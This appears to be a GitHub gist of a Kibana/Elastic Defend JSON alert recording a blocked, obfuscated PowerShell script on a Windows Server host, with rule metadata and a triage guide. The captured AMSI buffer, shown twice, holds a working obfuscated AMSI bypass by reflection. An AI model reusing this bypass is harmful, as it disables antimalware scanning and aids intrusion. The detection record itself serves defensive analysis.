Created
          October 14, 2025 15:24 
        
      - 
      
- 
        Save Samirbous/3994b27bf65ae4b9d04b8128385ec9a6 to your computer and use it in GitHub Desktop. 
  
    
      This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
      Learn more about bidirectional Unicode characters
    
  
  
    
  | { | |
| "_index": ".internal.alerts-security.alerts-default-000002", | |
| "_id": "f5416543d2a90170e669a1304a4a3afd73311220b52072064b09c619f5e31659", | |
| "_score": 1, | |
| "_source": { | |
| "kibana.alert.rule.execution.timestamp": "2025-10-14T15:22:17.403Z", | |
| "kibana.alert.start": "2025-10-14T15:22:17.403Z", | |
| "kibana.alert.last_detected": "2025-10-14T15:22:17.403Z", | |
| "kibana.version": "9.1.2", | |
| "kibana.alert.rule.parameters": { | |
| "description": "Generates a detection alert each time an Elastic Defend alert is received. Enabling this rule allows you to immediately begin investigating your Endpoint alerts.", | |
| "risk_score": 47, | |
| "severity": "medium", | |
| "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Endpoint Security (Elastic Defend)\n\nElastic Defend is a robust endpoint security solution that monitors and protects systems by analyzing events and generating alerts for suspicious activities. Adversaries may exploit endpoints by executing unauthorized code or manipulating system processes. The detection rule leverages event data to identify alerts from Elastic Defend, focusing on potential threats while excluding non-relevant modules, thus enabling timely investigation of endpoint anomalies.\n\n### Possible investigation steps\n\n- Review the alert details to understand the specific event.kind:alert and event.module: endpoint that triggered the alert, ensuring it is not related to the excluded endgame module.\n- Examine the timeline of events leading up to the alert to identify any unusual or unauthorized activities, such as unexpected process executions or system changes.\n- Correlate the alert with other security events or logs from the same endpoint to gather additional context and determine if there is a pattern of suspicious behavior.\n- Investigate the source and destination of any network connections associated with the alert to identify potential command and control activity or data exfiltration attempts.\n- Check for any recent changes or updates to the endpoint's software or configuration that could explain the alert, ensuring they are legitimate and authorized.\n- Assess the risk score and severity of the alert in conjunction with other alerts from the same endpoint to prioritize the investigation and response efforts.\n\n### False positive analysis\n\n- Alerts triggered by routine software updates can be false positives. Users can create exceptions for known update processes to prevent unnecessary alerts.\n- System maintenance activities, such as scheduled scans or backups, may generate alerts. Exclude these activities by identifying their specific event signatures and adding them to the exception list.\n- Legitimate administrative actions, like remote desktop sessions or script executions by IT staff, might be flagged. Define exceptions for these actions by correlating them with authorized user accounts or IP addresses.\n- Frequent alerts from non-malicious applications that interact with system processes can be excluded by whitelisting these applications based on their hash or path.\n- Network monitoring tools that simulate attack patterns for testing purposes may trigger alerts. Exclude these tools by specifying their known behaviors and IP ranges in the exception settings.\n\n### Response and remediation\n\n- Isolate the affected endpoint immediately to prevent further unauthorized access or lateral movement within the network.\n- Analyze the alert details to identify the specific unauthorized code or process manipulation involved, and terminate any malicious processes identified.\n- Remove any unauthorized code or files from the affected endpoint, ensuring that all traces of the threat are eradicated.\n- Conduct a thorough review of system logs and event data to identify any additional indicators of compromise or related suspicious activities.\n- Update endpoint security configurations and signatures to prevent similar threats from exploiting the same vulnerabilities in the future.\n- Restore the affected endpoint from a known good backup if necessary, ensuring that the system is free from any residual threats.\n- Escalate the incident to the security operations center (SOC) or relevant team for further analysis and to determine if additional systems may be affected.", | |
| "license": "Elastic License v2", | |
| "rule_name_override": "message", | |
| "timestamp_override": "event.ingested", | |
| "author": [ | |
| "Elastic" | |
| ], | |
| "false_positives": [], | |
| "from": "now-2m", | |
| "rule_id": "9a1a2dae-0b5f-4c3d-8305-a268d404c306", | |
| "max_signals": 1000, | |
| "risk_score_mapping": [ | |
| { | |
| "field": "event.risk_score", | |
| "operator": "equals", | |
| "value": "" | |
| } | |
| ], | |
| "severity_mapping": [ | |
| { | |
| "field": "event.severity", | |
| "operator": "equals", | |
| "severity": "low", | |
| "value": "21" | |
| }, | |
| { | |
| "field": "event.severity", | |
| "operator": "equals", | |
| "severity": "medium", | |
| "value": "47" | |
| }, | |
| { | |
| "field": "event.severity", | |
| "operator": "equals", | |
| "severity": "high", | |
| "value": "73" | |
| }, | |
| { | |
| "field": "event.severity", | |
| "operator": "equals", | |
| "severity": "critical", | |
| "value": "99" | |
| } | |
| ], | |
| "threat": [], | |
| "to": "now", | |
| "references": [], | |
| "version": 108, | |
| "exceptions_list": [ | |
| { | |
| "id": "endpoint_list", | |
| "list_id": "endpoint_list", | |
| "type": "endpoint", | |
| "namespace_type": "agnostic" | |
| } | |
| ], | |
| "immutable": true, | |
| "rule_source": { | |
| "type": "external", | |
| "is_customized": false | |
| }, | |
| "related_integrations": [ | |
| { | |
| "package": "endpoint", | |
| "version": "^9.0.0" | |
| } | |
| ], | |
| "required_fields": [ | |
| { | |
| "name": "event.kind", | |
| "type": "keyword", | |
| "ecs": true | |
| }, | |
| { | |
| "name": "event.module", | |
| "type": "keyword", | |
| "ecs": true | |
| } | |
| ], | |
| "setup": "## Setup\n\n### Elastic Defend Alerts\nIf this rule is disabled, you will not receive alerts for Elastic Defend alerts. This rule is designed to capture all alerts generated by Elastic Defend. For more granular alerting, consider using additional prebuilt-rules that capture specific Elastic Defend alerts.\n\nIf this rule is enabled, along with the related rules listed below, you will receive duplicate alerts for the same events. To avoid this, it is recommended to disable this generic rule and enable the more specific rules that capture these alerts separately.\n\nRelated rules:\n- Behavior - Detected - Elastic Defend (UUID: 0f615fe4-eaa2-11ee-ae33-f661ea17fbce)\n- Behavior - Prevented - Elastic Defend (UUID: eb804972-ea34-11ee-a417-f661ea17fbce)\n- Malicious File - Detected - Elastic Defend (UUID: f2c3caa6-ea34-11ee-a417-f661ea17fbce)\n- Malicious File - Prevented - Elastic Defend (UUID: f87e6122-ea34-11ee-a417-f661ea17fbce)\n- Memory Threat - Detected - Elastic Defend (UUID: 017de1e4-ea35-11ee-a417-f661ea17fbce)\n- Memory Threat - Prevented - Elastic Defend (UUID: 06f3a26c-ea35-11ee-a417-f661ea17fbce)\n- Ransomware - Detected - Elastic Defend (UUID: 0c74cd7e-ea35-11ee-a417-f661ea17fbce)\n- Ransomware - Prevented - Elastic Defend (UUID: 10f3d520-ea35-11ee-a417-f661ea17fbce)\n\n### Additional notes\n\nFor information on troubleshooting the maximum alerts warning please refer to this [guide](https://www.elastic.co/guide/en/security/current/alerts-ui-monitor.html#troubleshoot-max-alerts).\n", | |
| "type": "query", | |
| "language": "kuery", | |
| "index": [ | |
| "logs-endpoint.alerts-*" | |
| ], | |
| "query": "event.kind:alert and event.module:(endpoint and not endgame)\n" | |
| }, | |
| "kibana.alert.rule.category": "Custom Query Rule", | |
| "kibana.alert.rule.consumer": "siem", | |
| "kibana.alert.rule.execution.uuid": "f57614b2-41d6-4d61-bba2-ed5d8a040f12", | |
| "kibana.alert.rule.name": "Malicious Behavior Prevention Alert: Potential Obfuscated PowerShell Script", | |
| "kibana.alert.rule.producer": "siem", | |
| "kibana.alert.rule.revision": 0, | |
| "kibana.alert.rule.rule_type_id": "siem.queryRule", | |
| "kibana.alert.rule.uuid": "0a1f09ab-3c54-44a0-b434-b6af4e252a3f", | |
| "kibana.space_ids": [ | |
| "default" | |
| ], | |
| "kibana.alert.rule.tags": [ | |
| "Data Source: Elastic Defend", | |
| "Resources: Investigation Guide" | |
| ], | |
| "@timestamp": "2025-10-14T15:22:17.361Z", | |
| "agent": { | |
| "build": { | |
| "original": "version: 9.1.2, compiled: Thu Aug 7 15:00:00 2025, branch: HEAD, commit: 26c15136855b7ac73fdaa74b77e6492f254420c5" | |
| }, | |
| "id": "6570a119-1004-44eb-b3eb-5324657de79e", | |
| "type": "endpoint", | |
| "version": "9.1.2" | |
| }, | |
| "process": { | |
| "Ext": { | |
| "code_signature": [ | |
| { | |
| "trusted": true, | |
| "subject_name": "Microsoft Windows", | |
| "exists": true, | |
| "status": "trusted" | |
| } | |
| ], | |
| "api": { | |
| "summary": "AmsiScanBuffer( PowerShell, NULL, 69238e486d9598d02da6f03bbb7abd998911e42c5936619f4c00e4ff0cd598c9 )", | |
| "metadata": { | |
| "return_value": 1 | |
| }, | |
| "name": "AmsiScanBuffer", | |
| "parameters": { | |
| "app_name": "PowerShell", | |
| "size": 3822, | |
| "buffer": "$MV3l1C=$null;$rWS16tHn4=\"System.$(('Mánäg'+'èmênt').NoRmAliZE([Char](70)+[cHAR](111)+[ChaR](114+75-75)+[cHAR](65+44)+[chAr]([ByTe]0x44)) -replace [cHar](92*70/70)+[Char]([bytE]0x70)+[ChaR]([ByTE]0x7b)+[Char](77)+[chaR](108+2)+[chAR]([byTE]0x7d)).$(('Äú'+'tô'+'mä'+'tì'+'õn').NOrmaliZe([chAr](70*53/53)+[CHaR]([bytE]0x6f)+[cHaR]([BYTE]0x72)+[chAr](109)+[cHAr](10+58)) -replace [chAr](92+90-90)+[chAr]([bYTE]0x70)+[chAR](123+7-7)+[cHaR]([bYte]0x4d)+[cHAr]([bytE]0x6e)+[ChAR]([bYTe]0x7d)).$(('Á'+'m'+'s'+'î'+'Ù'+'t'+'í'+'l'+'s').nORMalIze([CHAR](14+56)+[chAR]([bYtE]0x6f)+[chAr]([bYte]0x72)+[CHaR](109*15/15)+[char]([bYtE]0x44)) -replace [CHAR](92+51-51)+[ChaR]([BYte]0x70)+[chaR]([Byte]0x7b)+[chAR]([BytE]0x4d)+[ChAR]([bytE]0x6e)+[ChaR](125))\";$igaqlsqbbrpoqjdswzgcmyrdbwdoj=\"+[chaR](99*97/97)+[CHAr]([BYTE]0x72)+[cHar]([byte]0x71)+[CHar](100+3-3)+[CHAR]([ByTE]0x65)+[Char](103*40/40)+[chAR](117*11/11)+[ChAr](115+45-45)+[cHAR](120)+[cHaR](113)+[cHAr]([BYTE]0x78)+[CHar]([bYtE]0x6b)+[Char](64+40)+[cHAR]([BYtE]0x62)+[CHAr]([BYte]0x7a)+[char](71+38)+[CHar]([byTE]0x6f)+[chAr](105*92/92)+[CHAR]([byte]0x66)+[Char](111+37-37)+[Char]([BYte]0x64)+[cHAr]([byTe]0x6a)\";[Threading.Thread]::Sleep(1873);[Ref].Assembly.GetType($rWS16tHn4).GetField($(('àmsì'+'Înít'+'Fâíl'+'êd').NOrMaLIze([CHAR](30+40)+[chAR]([BYTe]0x6f)+[char](114)+[cHar]([BYte]0x6d)+[chAr](1+67)) -replace [CHAr](44+48)+[chAR](112+105-105)+[chaR](123+92-92)+[chAr](77)+[CHAR]([Byte]0x6e)+[CHaR]([byte]0x7d)),\"NonPublic,Static\").SetValue($MV3l1C,$true);$qrxwkay=\"+[ChAr]([Byte]0x69)+[chAR]([byte]0x6e)+[ChaR]([byte]0x7a)+[cHAr]([BYTE]0x72)+[chAR](97+56-56)+[CHar]([bYtE]0x64)+[CHar](115)+[char]([bytE]0x61)+[cHAR](121)+[cHar]([BYtE]0x6e)+[chAR]([bytE]0x67)+[ChaR](98+77-77)+[CHaR](54+46)+[chAR]([bYTe]0x79)+[ChaR](61+46)+[ChAR](116)+[CHar](97*85/85)+[cHaR]([byTe]0x62)+[ChAR]([ByTE]0x6b)\";[Threading.Thread]::Sleep(1232)\n#Matt Graebers Reflection method " | |
| } | |
| }, | |
| "token": { | |
| "integrity_level_name": "high" | |
| } | |
| }, | |
| "args": [ | |
| "powershell" | |
| ], | |
| "parent": { | |
| "executable": "C:\\Windows\\System32\\cmd.exe" | |
| }, | |
| "code_signature": { | |
| "trusted": true, | |
| "subject_name": "Microsoft Windows", | |
| "exists": true, | |
| "status": "trusted" | |
| }, | |
| "pe": { | |
| "imphash": "741776aaccfc5b71ff59832dcdcace0f", | |
| "original_file_name": "PowerShell.EXE" | |
| }, | |
| "name": "powershell.exe", | |
| "pid": 1968, | |
| "args_count": 1, | |
| "entity_id": "Fr+lArd4jbWUm9nDJqjXuw", | |
| "command_line": "powershell", | |
| "executable": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", | |
| "hash": { | |
| "sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c" | |
| } | |
| }, | |
| "rule": { | |
| "name": "Potential Obfuscated PowerShell Script", | |
| "ruleset": "production", | |
| "description": "Identifies the execution of PowerShell with potentially obfuscated content. This behavior is often observed during malware installation leveraging PowerShell.", | |
| "id": "f4db84b1-13d8-432d-999a-54a09784e62b", | |
| "version": "1.0.4" | |
| }, | |
| "message": "Malicious Behavior Prevention Alert: Potential Obfuscated PowerShell Script", | |
| "Responses": [ | |
| { | |
| "result": 0, | |
| "process": { | |
| "name": "powershell.exe", | |
| "pid": 1968, | |
| "entity_id": "Fr+lArd4jbWUm9nDJqjXuw" | |
| }, | |
| "@timestamp": "2025-10-14T15:21:30.5966574Z", | |
| "action": { | |
| "field": "process.entity_id", | |
| "action": "kill_process", | |
| "state": 0 | |
| }, | |
| "message": "Success" | |
| } | |
| ], | |
| "Endpoint": { | |
| "policy": { | |
| "applied": { | |
| "name": "myDefend", | |
| "id": "27c05512-d3ed-4826-9f1d-d8876a66d61a", | |
| "endpoint_policy_version": "11", | |
| "version": "12", | |
| "artifacts": { | |
| "global": { | |
| "manifest_type": "stable", | |
| "identifiers": [ | |
| { | |
| "sha256": "44341700c27a82d3b4a8471cfe8a57447fc6ddbac8f1e855707dd3767e9491e2", | |
| "name": "diagnostic-configuration-v1" | |
| }, | |
| { | |
| "sha256": "338eb3e0d0c2b7efcd291ca270a0a6188d3632a25c7a8dc5d020fdb44293e12f", | |
| "name": "diagnostic-endpointpe-v4-blocklist" | |
| }, | |
| { | |
| "sha256": "9399bb8a3210f3ffea4e028eb3d087455bab6678df8b56ad77f276ee376533ef", | |
| "name": "diagnostic-endpointpe-v4-exceptionlist" | |
| }, | |
| { | |
| "sha256": "eae3c9a96708f28da4346ee245b8d673642ee9295e0f0aa4192889d4ade3616a", | |
| "name": "diagnostic-endpointpe-v4-model" | |
| }, | |
| { | |
| "sha256": "fd827c57f7b99723b3f6f7dbf0c2644ac5147f4ebbe320edc6ccd4b7ce68001c", | |
| "name": "diagnostic-malware-signature-v1-windows" | |
| }, | |
| { | |
| "sha256": "9636fb1bda16d4dc236d40d2aeb379f30d81276028e9b3048002e3ca6a83dfb5", | |
| "name": "diagnostic-ransomware-v1-windows" | |
| }, | |
| { | |
| "sha256": "81af5fca19bd11e5f167685e1b638ad360d08c39af8264144464e6991019ad28", | |
| "name": "diagnostic-rules-windows-v1" | |
| }, | |
| { | |
| "sha256": "1c0de0df678f1e42eed7635722be3e82fd6731585bc2618086d126ec9b70121b", | |
| "name": "endpointpe-v4-blocklist" | |
| }, | |
| { | |
| "sha256": "6aa317caa75a727cb988c45e8af7d5c0fc5e722a6322aad190bc3c8bf56c2e3d", | |
| "name": "endpointpe-v4-exceptionlist" | |
| }, | |
| { | |
| "sha256": "cf2335c28acaee3072ffd893f229242be71ba75043ae96576227f9fea651c497", | |
| "name": "endpointpe-v4-model" | |
| }, | |
| { | |
| "sha256": "85501044f22938c806155e33a171abbce9eb4c1544d45d45c6c049c7cb1395d7", | |
| "name": "global-configuration-v1" | |
| }, | |
| { | |
| "sha256": "3a6bf42f273a2e663d9ad273b445cca21d9da8bb336f6f62b262dc55598e1005", | |
| "name": "global-eventfilterlist-windows-v1" | |
| }, | |
| { | |
| "sha256": "f50a756ecf8fd5c4fbe40efbec2bac52f9deb1dab44850f107b4b27663406573", | |
| "name": "global-exceptionlist-windows" | |
| }, | |
| { | |
| "sha256": "aaeab218a20828574c347e88ecb4eb411ffca9e8496c484327b2213f49e1dc9e", | |
| "name": "global-trustlist-windows-v1" | |
| }, | |
| { | |
| "sha256": "1fa3b2936f9cc7adcef6d0af6803f32cb1e965b1297056620396ce31605151ac", | |
| "name": "production-malware-signature-v1-windows" | |
| }, | |
| { | |
| "sha256": "e3efc40c7e3fc0a590a074011abf990ab120f9f182b3dbca7b32ee58d0e5c3aa", | |
| "name": "production-ransomware-v1-windows" | |
| }, | |
| { | |
| "sha256": "608fb0db8fa37493c5cdcbb4e319ff911937bb8b021efc3efb7d58d1cf88d3bf", | |
| "name": "production-rules-windows-v1" | |
| }, | |
| { | |
| "sha256": "07f2a166efe84d3b52b6cd8b841f33ffe6eb8e2297cefd4eaa3e50e567b4d30e", | |
| "name": "tamper-protection-config-v1" | |
| } | |
| ], | |
| "channel": "default", | |
| "update_age": 0, | |
| "version": "1.0.1638+2025-10-13-daily", | |
| "snapshot": "latest" | |
| }, | |
| "user": { | |
| "identifiers": [ | |
| { | |
| "sha256": "d801aa1fb7ddcc330a5e3173372ea6af4a3d08ec58074478e85aa5603e926658", | |
| "name": "endpoint-blocklist-windows-v1" | |
| }, | |
| { | |
| "sha256": "d801aa1fb7ddcc330a5e3173372ea6af4a3d08ec58074478e85aa5603e926658", | |
| "name": "endpoint-eventfilterlist-windows-v1" | |
| }, | |
| { | |
| "sha256": "d801aa1fb7ddcc330a5e3173372ea6af4a3d08ec58074478e85aa5603e926658", | |
| "name": "endpoint-exceptionlist-windows-v1" | |
| }, | |
| { | |
| "sha256": "d801aa1fb7ddcc330a5e3173372ea6af4a3d08ec58074478e85aa5603e926658", | |
| "name": "endpoint-hostisolationexceptionlist-windows-v1" | |
| }, | |
| { | |
| "sha256": "d801aa1fb7ddcc330a5e3173372ea6af4a3d08ec58074478e85aa5603e926658", | |
| "name": "endpoint-trustlist-windows-v1" | |
| } | |
| ], | |
| "version": "1.0.0" | |
| } | |
| } | |
| } | |
| } | |
| }, | |
| "ecs": { | |
| "version": "8.10.0" | |
| }, | |
| "Events": [ | |
| { | |
| "process": { | |
| "Ext": { | |
| "code_signature": [ | |
| { | |
| "trusted": true, | |
| "subject_name": "Microsoft Windows", | |
| "exists": true, | |
| "status": "trusted" | |
| } | |
| ], | |
| "api": { | |
| "summary": "AmsiScanBuffer( PowerShell, NULL, 69238e486d9598d02da6f03bbb7abd998911e42c5936619f4c00e4ff0cd598c9 )", | |
| "metadata": { | |
| "return_value": 1 | |
| }, | |
| "name": "AmsiScanBuffer", | |
| "parameters": { | |
| "app_name": "PowerShell", | |
| "size": 3822, | |
| "buffer": "$MV3l1C=$null;$rWS16tHn4=\"System.$(('Mánäg'+'èmênt').NoRmAliZE([Char](70)+[cHAR](111)+[ChaR](114+75-75)+[cHAR](65+44)+[chAr]([ByTe]0x44)) -replace [cHar](92*70/70)+[Char]([bytE]0x70)+[ChaR]([ByTE]0x7b)+[Char](77)+[chaR](108+2)+[chAR]([byTE]0x7d)).$(('Äú'+'tô'+'mä'+'tì'+'õn').NOrmaliZe([chAr](70*53/53)+[CHaR]([bytE]0x6f)+[cHaR]([BYTE]0x72)+[chAr](109)+[cHAr](10+58)) -replace [chAr](92+90-90)+[chAr]([bYTE]0x70)+[chAR](123+7-7)+[cHaR]([bYte]0x4d)+[cHAr]([bytE]0x6e)+[ChAR]([bYTe]0x7d)).$(('Á'+'m'+'s'+'î'+'Ù'+'t'+'í'+'l'+'s').nORMalIze([CHAR](14+56)+[chAR]([bYtE]0x6f)+[chAr]([bYte]0x72)+[CHaR](109*15/15)+[char]([bYtE]0x44)) -replace [CHAR](92+51-51)+[ChaR]([BYte]0x70)+[chaR]([Byte]0x7b)+[chAR]([BytE]0x4d)+[ChAR]([bytE]0x6e)+[ChaR](125))\";$igaqlsqbbrpoqjdswzgcmyrdbwdoj=\"+[chaR](99*97/97)+[CHAr]([BYTE]0x72)+[cHar]([byte]0x71)+[CHar](100+3-3)+[CHAR]([ByTE]0x65)+[Char](103*40/40)+[chAR](117*11/11)+[ChAr](115+45-45)+[cHAR](120)+[cHaR](113)+[cHAr]([BYTE]0x78)+[CHar]([bYtE]0x6b)+[Char](64+40)+[cHAR]([BYtE]0x62)+[CHAr]([BYte]0x7a)+[char](71+38)+[CHar]([byTE]0x6f)+[chAr](105*92/92)+[CHAR]([byte]0x66)+[Char](111+37-37)+[Char]([BYte]0x64)+[cHAr]([byTe]0x6a)\";[Threading.Thread]::Sleep(1873);[Ref].Assembly.GetType($rWS16tHn4).GetField($(('àmsì'+'Înít'+'Fâíl'+'êd').NOrMaLIze([CHAR](30+40)+[chAR]([BYTe]0x6f)+[char](114)+[cHar]([BYte]0x6d)+[chAr](1+67)) -replace [CHAr](44+48)+[chAR](112+105-105)+[chaR](123+92-92)+[chAr](77)+[CHAR]([Byte]0x6e)+[CHaR]([byte]0x7d)),\"NonPublic,Static\").SetValue($MV3l1C,$true);$qrxwkay=\"+[ChAr]([Byte]0x69)+[chAR]([byte]0x6e)+[ChaR]([byte]0x7a)+[cHAr]([BYTE]0x72)+[chAR](97+56-56)+[CHar]([bYtE]0x64)+[CHar](115)+[char]([bytE]0x61)+[cHAR](121)+[cHar]([BYtE]0x6e)+[chAR]([bytE]0x67)+[ChaR](98+77-77)+[CHaR](54+46)+[chAR]([bYTe]0x79)+[ChaR](61+46)+[ChAR](116)+[CHar](97*85/85)+[cHaR]([byTe]0x62)+[ChAR]([ByTE]0x6b)\";[Threading.Thread]::Sleep(1232)\n#Matt Graebers Reflection method " | |
| } | |
| }, | |
| "token": { | |
| "integrity_level_name": "high" | |
| } | |
| }, | |
| "parent": { | |
| "executable": "C:\\Windows\\System32\\cmd.exe" | |
| }, | |
| "code_signature": { | |
| "trusted": true, | |
| "subject_name": "Microsoft Windows", | |
| "exists": true, | |
| "status": "trusted" | |
| }, | |
| "name": "powershell.exe", | |
| "pid": 1968, | |
| "entity_id": "Fr+lArd4jbWUm9nDJqjXuw", | |
| "command_line": "powershell", | |
| "executable": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" | |
| }, | |
| "@timestamp": "2025-10-14T15:21:30.2270851Z", | |
| "_state": 0, | |
| "host": { | |
| "hostname": "win-svr-2019-st", | |
| "os": { | |
| "Ext": { | |
| "variant": "Windows Server 2019 Standard" | |
| }, | |
| "kernel": "1809 (10.0.17763.2061)", | |
| "name": "Windows", | |
| "family": "windows", | |
| "type": "windows", | |
| "version": "1809 (10.0.17763.2061)", | |
| "platform": "windows", | |
| "full": "Windows Server 2019 Standard 1809 (10.0.17763.2061)" | |
| }, | |
| "ip": [ | |
| "10.0.0.19", | |
| "fe80::382c:f652:1d40:ee4e", | |
| "192.168.56.1", | |
| "fe80::5d9e:2b92:1905:13a8", | |
| "127.0.0.1", | |
| "::1" | |
| ], | |
| "name": "win-svr-2019-st", | |
| "id": "cb7eef6d-979b-434c-b48f-5a91a9c6cfcf", | |
| "mac": [ | |
| "00-50-56-11-7d-d9", | |
| "0a-00-27-00-00-04" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "event": { | |
| "provider": "Microsoft-Antimalware-Scan-Interface", | |
| "created": "2025-10-14T15:21:30.5741785Z", | |
| "kind": "event", | |
| "id": "OCsWZ8Jp4Gz3668A++++g337", | |
| "category": [ | |
| "api" | |
| ], | |
| "type": [ | |
| "allowed" | |
| ], | |
| "outcome": "unknown" | |
| }, | |
| "message": "Endpoint API event - AmsiScanBuffer", | |
| "user": { | |
| "domain": "WIN-SVR-2019-ST", | |
| "name": "Administrator", | |
| "id": "S-1-5-21-2202811333-351044183-798744757-500" | |
| }, | |
| "_label": "amsi_powershell_obfuscation_pattern" | |
| } | |
| ], | |
| "data_stream": { | |
| "namespace": "default", | |
| "type": "logs", | |
| "dataset": "endpoint.alerts" | |
| }, | |
| "elastic": { | |
| "agent": { | |
| "id": "6570a119-1004-44eb-b3eb-5324657de79e" | |
| } | |
| }, | |
| "host": { | |
| "hostname": "win-svr-2019-st", | |
| "os": { | |
| "Ext": { | |
| "variant": "Windows Server 2019 Standard" | |
| }, | |
| "kernel": "1809 (10.0.17763.2061)", | |
| "name": "Windows", | |
| "family": "windows", | |
| "type": "windows", | |
| "version": "1809 (10.0.17763.2061)", | |
| "platform": "windows", | |
| "full": "Windows Server 2019 Standard 1809 (10.0.17763.2061)" | |
| }, | |
| "ip": [ | |
| "10.0.0.19", | |
| "fe80::382c:f652:1d40:ee4e", | |
| "192.168.56.1", | |
| "fe80::5d9e:2b92:1905:13a8", | |
| "127.0.0.1", | |
| "::1" | |
| ], | |
| "name": "win-svr-2019-st", | |
| "id": "cb7eef6d-979b-434c-b48f-5a91a9c6cfcf", | |
| "mac": [ | |
| "00-50-56-11-7d-d9", | |
| "0a-00-27-00-00-04" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "threat": [ | |
| { | |
| "framework": "MITRE ATT&CK", | |
| "technique": [ | |
| { | |
| "reference": "https://attack.mitre.org/techniques/T1059/", | |
| "name": "Command and Scripting Interpreter", | |
| "subtechnique": [ | |
| { | |
| "reference": "https://attack.mitre.org/techniques/T1059/001/", | |
| "name": "PowerShell", | |
| "id": "T1059.001" | |
| } | |
| ], | |
| "id": "T1059" | |
| } | |
| ], | |
| "tactic": { | |
| "reference": "https://attack.mitre.org/tactics/TA0002/", | |
| "name": "Execution", | |
| "id": "TA0002" | |
| } | |
| } | |
| ], | |
| "event": { | |
| "severity": 73, | |
| "code": "behavior", | |
| "risk_score": 73, | |
| "created": "2025-10-14T15:21:30.5762347Z", | |
| "module": "endpoint", | |
| "type": [ | |
| "info", | |
| "denied" | |
| ], | |
| "agent_id_status": "verified", | |
| "sequence": 106319, | |
| "ingested": "2025-10-14T15:22:06Z", | |
| "action": "rule_detection", | |
| "id": "OCsWZ8Jp4Gz3668A++++g348", | |
| "category": [ | |
| "malware", | |
| "intrusion_detection" | |
| ], | |
| "dataset": "endpoint.alerts", | |
| "outcome": "success" | |
| }, | |
| "user": { | |
| "domain": "WIN-SVR-2019-ST", | |
| "name": "Administrator", | |
| "id": "S-1-5-21-2202811333-351044183-798744757-500" | |
| }, | |
| "kibana.alert.original_data_stream.namespace": "default", | |
| "kibana.alert.original_data_stream.type": "logs", | |
| "kibana.alert.original_data_stream.dataset": "endpoint.alerts", | |
| "kibana.alert.original_event.severity": 73, | |
| "kibana.alert.original_event.code": "behavior", | |
| "kibana.alert.original_event.risk_score": 73, | |
| "kibana.alert.original_event.created": "2025-10-14T15:21:30.5762347Z", | |
| "kibana.alert.original_event.kind": "alert", | |
| "kibana.alert.original_event.module": "endpoint", | |
| "kibana.alert.original_event.type": [ | |
| "info", | |
| "denied" | |
| ], | |
| "kibana.alert.original_event.agent_id_status": "verified", | |
| "kibana.alert.original_event.sequence": 106319, | |
| "kibana.alert.original_event.ingested": "2025-10-14T15:22:06Z", | |
| "kibana.alert.original_event.action": "rule_detection", | |
| "kibana.alert.original_event.id": "OCsWZ8Jp4Gz3668A++++g348", | |
| "kibana.alert.original_event.category": [ | |
| "malware", | |
| "intrusion_detection" | |
| ], | |
| "kibana.alert.original_event.dataset": "endpoint.alerts", | |
| "kibana.alert.original_event.outcome": "success", | |
| "event.kind": "signal", | |
| "kibana.alert.original_time": "2025-10-14T15:21:30.576Z", | |
| "kibana.alert.ancestors": [ | |
| { | |
| "id": "AZnjUAfs4fyCfCR7INh3", | |
| "type": "event", | |
| "index": ".ds-logs-endpoint.alerts-default-2025.09.24-000002", | |
| "depth": 0 | |
| } | |
| ], | |
| "kibana.alert.status": "active", | |
| "kibana.alert.workflow_status": "open", | |
| "kibana.alert.depth": 1, | |
| "kibana.alert.reason": "malware, intrusion_detection event with process powershell.exe, by Administrator on win-svr-2019-st created high alert Malicious Behavior Prevention Alert: Potential Obfuscated PowerShell Script.", | |
| "kibana.alert.severity": "high", | |
| "kibana.alert.risk_score": 73, | |
| "kibana.alert.rule.actions": [], | |
| "kibana.alert.rule.author": [ | |
| "Elastic" | |
| ], | |
| "kibana.alert.rule.created_at": "2025-08-25T09:37:22.832Z", | |
| "kibana.alert.rule.created_by": "586246785", | |
| "kibana.alert.rule.description": "Generates a detection alert each time an Elastic Defend alert is received. Enabling this rule allows you to immediately begin investigating your Endpoint alerts.", | |
| "kibana.alert.rule.enabled": true, | |
| "kibana.alert.rule.exceptions_list": [ | |
| { | |
| "id": "endpoint_list", | |
| "list_id": "endpoint_list", | |
| "type": "endpoint", | |
| "namespace_type": "agnostic" | |
| } | |
| ], | |
| "kibana.alert.rule.false_positives": [], | |
| "kibana.alert.rule.from": "now-2m", | |
| "kibana.alert.rule.immutable": true, | |
| "kibana.alert.rule.interval": "1m", | |
| "kibana.alert.rule.indices": [ | |
| "logs-endpoint.alerts-*" | |
| ], | |
| "kibana.alert.rule.license": "Elastic License v2", | |
| "kibana.alert.rule.max_signals": 1000, | |
| "kibana.alert.rule.note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Endpoint Security (Elastic Defend)\n\nElastic Defend is a robust endpoint security solution that monitors and protects systems by analyzing events and generating alerts for suspicious activities. Adversaries may exploit endpoints by executing unauthorized code or manipulating system processes. The detection rule leverages event data to identify alerts from Elastic Defend, focusing on potential threats while excluding non-relevant modules, thus enabling timely investigation of endpoint anomalies.\n\n### Possible investigation steps\n\n- Review the alert details to understand the specific event.kind:alert and event.module: endpoint that triggered the alert, ensuring it is not related to the excluded endgame module.\n- Examine the timeline of events leading up to the alert to identify any unusual or unauthorized activities, such as unexpected process executions or system changes.\n- Correlate the alert with other security events or logs from the same endpoint to gather additional context and determine if there is a pattern of suspicious behavior.\n- Investigate the source and destination of any network connections associated with the alert to identify potential command and control activity or data exfiltration attempts.\n- Check for any recent changes or updates to the endpoint's software or configuration that could explain the alert, ensuring they are legitimate and authorized.\n- Assess the risk score and severity of the alert in conjunction with other alerts from the same endpoint to prioritize the investigation and response efforts.\n\n### False positive analysis\n\n- Alerts triggered by routine software updates can be false positives. Users can create exceptions for known update processes to prevent unnecessary alerts.\n- System maintenance activities, such as scheduled scans or backups, may generate alerts. 